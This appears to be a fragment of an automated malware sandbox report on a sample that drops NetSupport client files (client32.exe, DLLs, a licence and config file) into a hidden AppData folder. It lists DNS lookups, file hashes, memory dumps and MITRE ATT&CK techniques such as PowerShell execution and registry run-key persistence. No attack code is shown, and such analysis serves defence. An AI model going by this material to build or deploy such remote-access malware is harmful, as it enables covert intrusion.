2.18.190.80
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

61.45.26.184.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

61.45.26.184.in-addr.arpa
8.8.8.8:53

186.162.141.79.in-addr.arpa

dns

73 B
138 B
1
1

DNS Request

186.162.141.79.in-addr.arpa
8.8.8.8:53

73.190.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

73.190.18.2.in-addr.arpa
8.8.8.8:53

10.27.171.150.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

10.27.171.150.in-addr.arpa
8.8.8.8:53

0.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

0.159.190.20.in-addr.arpa
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

geo.netsupportsoftware.com

dns

client32.exe

72 B
120 B
1
1

DNS Request

geo.netsupportsoftware.com

DNS Response

172.67.68.212

104.26.0.231

104.26.1.231
8.8.8.8:53

143.159.181.5.in-addr.arpa

dns

72 B
113 B
1
1

DNS Request

143.159.181.5.in-addr.arpa
8.8.8.8:53

212.68.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

212.68.67.172.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

212.20.149.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

212.20.149.52.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

79.190.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

79.190.18.2.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.27.10

150.171.28.10

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lr1ob443.xj4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\NSM.LIC

Filesize
195B

MD5
e9609072de9c29dc1963be208948ba44

SHA1
03bbe27d0d1ba651ff43363587d3d6d2e170060f

SHA256
dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747

SHA512
f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

Download Submit
C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\PCICHEK.DLL

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\PCICL32.dll

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe

Filesize
101KB

MD5
c4f1b50e3111d29774f7525039ff7086

SHA1
57539c95cba0986ec8df0fcdea433e7c71b724c6

SHA256
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

SHA512
005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

Download Submit
C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.ini

Filesize
669B

MD5
f734588a7620c48021688d3c2940353a

SHA1
c9b9aece48b4c134b838217426145fdd542f60e6

SHA256
97a2ce9683de5c9e03331d22309b5348f45cf65e77b1f011ba3505e2deafafc6

SHA512
0549dcc50347802c774078f6f9ecfec2b21b0c489aa8e96168ea12a2cec55169d4172baac13819a07686755697794f05ac5b75d554229faf268f9e64f54e2033

Download Submit
C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
memory/5024-21-0x0000012A21110000-0x0000012A21122000-memory.dmp

Filesize
72KB

Download
memory/5024-20-0x0000012A210E0000-0x0000012A210EA000-memory.dmp

Filesize
40KB

Download
memory/5024-18-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

Filesize
10.8MB

Download
memory/5024-6-0x00007FFCD7C93000-0x00007FFCD7C95000-memory.dmp

Filesize
8KB

Download
memory/5024-17-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

Filesize
10.8MB

Download
memory/5024-10-0x0000012A08F00000-0x0000012A08F22000-memory.dmp

Filesize
136KB

Download
memory/5024-86-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.